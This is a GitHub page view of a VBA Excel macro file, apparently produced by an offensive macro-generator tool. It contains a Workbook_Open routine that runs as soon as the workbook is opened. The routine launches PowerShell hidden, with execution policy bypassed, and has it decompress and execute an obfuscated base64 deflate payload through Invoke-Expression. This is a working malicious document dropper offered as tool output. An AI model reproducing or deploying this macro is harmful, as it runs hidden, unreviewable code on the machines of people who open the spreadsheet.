-
Notifications
You must be signed in to change notification settings - Fork 115
/
Copy pathmacro.txt
60 lines (53 loc) · 2.7 KB
/
macro.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
Sub Workbook_Open()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "nVbLiuNGFN33VxRGC5u2mpJKzzENM8kQGAgh0E2yMF6USqW0iCwbWZ"
str = str + "64J8m/R+fYV5NONiGbW+9zz31KgVOP6v3ibvux6z7tj4dhXC"
str = str + "5+9UPvOxM/1F23WO3U8Vx1rVOn0Y7T4C/jdK4+9eOP46B+ao"
str = str + "fxbLsPXXdwy9veb2t1bvtRXW7j6238str8bz3fDt6O/vllGm"
str = str + "rRc77hfl6rr5pvs7/pvu38U/v+9NkN43/Rvff7kx+X/0aerV"
str = str + "q8vwsOkyM/1HX4/Hr0KpzeVH746Ju2b8f20KvAqfAHu/dq8X"
str = str + "Pbm3ihwn5anY7WecWd7869w82TCo/2dBpfhvNdcHkMDu/evX"
str = str + "GyXutLpDUGcx0Svdqo7Tevo9/udsEJEdWX2k4nzk2iLieRJ5"
str = str + "OIIRqItMASBw6iirDHGZ4VBuApTjGratnzeNYA1PAFuQBPG1"
str = str + "mWOVRCmAzccC9vcIBZNevgXuNpBd5imWAZAz7G27iCyhhCy0"
str = str + "EOAI17BVAygGbknAqeBd0SIsayAr8CUCVQLBTlhRDPcSUH+8"
str = str + "iKgTne2lxMraEjqYV4g1kEfhXdlAiog6ggPC2HtrySF4bwEA"
str = str + "bIUSx7Gi8KggIvI1OwKkvRa7EXa1kS3s8AJWYulUAxlpmWpX"
str = str + "HMF/G98aIydWKHxgvLKPAt2QNPZ+LnqBa8PBUTGCNe0fCBB3"
str = str + "sLUYKu9UKDZtHjCfRaXHbgrHEvMcKgIAOcJoAvE6HhmzlGYJ"
str = str + "AV4o0GKFkqyD6RRDJ0kxfOOpXo0/Kap3NULZ1Ie424nXnfgE"
str = str + "YCksaIY0mD2URTmbERSUKkVmYMaMUDBo+X5+R3kRhTECCX8D"
str = str + "CzM1x2NCYVbTVNoK9g9LXoWIh0MQuCYXTCoDHiCF2IYO1fy5"
str = str + "leSyQehKdyZnvNytNiIHO8wrJ4O2Od8wXTsaoElO3BlBItQ4"
str = str + "fR2aXA0+PMPwKwW7Ap0MBrBAHPkkyN8KOvPFEYNwaFl2mWE2"
str = str + "0soa+E2OZYOPVcas7PoYXKBIqyWFQyCjoXzvQfc5Iupl8Yxh"
str = str + "jiWoNsr3MJUbAjZQAoSjHL0kD2xEwShMrZKFgGzMlcCwCLic"
str = str + "2IhcMyZeWxW9Cd3OMp2yZ70/VePHM2EpR43mPKM/XySEwgHr"
str = str + "OTJU6LmMAFQ2GFH5d0MZOaDZSly72MvmLazmE0dNOcf+W8xx"
str = str + "Jntl9pMCO0RMvNX5KKvZOfDlo+txZ+A65lYIQB04Jud1iypl"
str = str + "kkfKFrSSl+t1jn7D4pZgVYsRUwRjSB1eNZYHjG+tDF5q45DG"
str = str + "oZtI96E7Qq7Py0OLmH733/y/gSRqtp9/5+pX7Hl/z2K7G9/k"
str = str + "vslsHl4fkwLUy8XN0H7WqtpqfboN2tVbRSf6jDeQz7c9dt/r"
str = str + "wLvvBf4M2P0MRgHVzWGPAP8DTaYQyfOu+PKnzy7tDXCr8KWv"
str = str + "8F"
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec,vbHide
End Sub
'---Generated by macro_safe.py by khr0x40sh---
'---VBA arch detection by "T"---